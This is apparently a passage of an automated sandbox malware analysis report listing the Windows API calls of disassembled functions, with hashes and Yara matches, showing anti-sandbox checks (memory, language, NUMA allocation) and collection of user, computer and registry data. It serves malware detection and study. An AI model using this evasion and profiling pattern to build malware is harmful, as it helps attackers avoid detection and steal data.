                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                      • String ID: X@
                                                                                                      • API String ID: 3258613111-2850556465
                                                                                                      • Opcode ID: c6c2cc0c5700292bd11ed3b71b6c3a56036e1d970a8218521193bfa127251a67
                                                                                                      • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                      • Opcode Fuzzy Hash: c6c2cc0c5700292bd11ed3b71b6c3a56036e1d970a8218521193bfa127251a67
                                                                                                      • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D58), ref: 00415F11
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D28), ref: 00415F2A
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D70), ref: 00415F42
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D88), ref: 00415F5A
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96DA0), ref: 00415F73
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBD968), ref: 00415F8B
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBE048), ref: 00415FA3
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBE348), ref: 00415FBC
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96DB8), ref: 00415FD4
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF718), ref: 00415FEC
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF748), ref: 00416005
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF628), ref: 0041601D
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBE1A8), ref: 00416035
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF598), ref: 0041604E
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                        • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                        • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                        • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                        • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                        • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                        • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                        • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                        • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                        • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                        • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                        • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                      • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                      • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1175201934-0
                                                                                                      • Opcode ID: 466e30400b452d8de00f7ab2a2e6fa4e6701d9e4b3183216076be2e723dd6b11
                                                                                                      • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                      • Opcode Fuzzy Hash: 466e30400b452d8de00f7ab2a2e6fa4e6701d9e4b3183216076be2e723dd6b11
                                                                                                      • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                      • __aulldiv.LIBCMT ref: 00401218
                                                                                                      • __aulldiv.LIBCMT ref: 00401226
                                                                                                      • ExitProcess.KERNEL32 ref: 00401254
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3404098578-2766056989
                                                                                                      • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                      • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                      • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                      • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFAC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFAC947
                                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CFAC969
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFAC9A9
                                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CFAC9C8
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CFAC9E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 4191843772-0
                                                                                                      • Opcode ID: 9f2ff79a093e90f8707e9e22ddff54256107a6a4f9fa30bc71365cd79417e32b
                                                                                                      • Instruction ID: 0b774ab6cba7f8d60d775f388b95346f4f280462ac9f3a5b0962fd255e511028
                                                                                                      • Opcode Fuzzy Hash: 9f2ff79a093e90f8707e9e22ddff54256107a6a4f9fa30bc71365cd79417e32b
                                                                                                      • Instruction Fuzzy Hash: 15212C32B01204ABDB059BE9CC85BAEB7BDBB4B340F50011DF917A7740DB315C048795
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                      • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3466090806-0
                                                                                                      • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                      • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                      • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                      • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,02D963F8,00000000,00020119,00000000), ref: 0041477B
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD88C0,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3466090806-0
                                                                                                      • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                      • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                      • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                      • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,02D960E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD7F30,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3466090806-0
                                                                                                      • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                      • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                      • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                      • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetEnvironmentVariableA.KERNEL32(02DD5230,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                      • LoadLibraryA.KERNEL32(02DD88A0,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • SetEnvironmentVariableA.KERNEL32(02DD5230,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                      Strings
                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                      • API String ID: 2929475105-3463377506
                                                                                                      • Opcode ID: 87c4ecc5cae1bb30076c5fa7cae4b4b31d77e3e1fa7da15e9efafcded89b07fc
                                                                                                      • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                      • Opcode Fuzzy Hash: 87c4ecc5cae1bb30076c5fa7cae4b4b31d77e3e1fa7da15e9efafcded89b07fc
                                                                                                      • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: :h@$:h@$@:h@
                                                                                                      • API String ID: 544645111-3492212131
                                                                                                      • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                      • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                      • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                      • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                      • String ID:
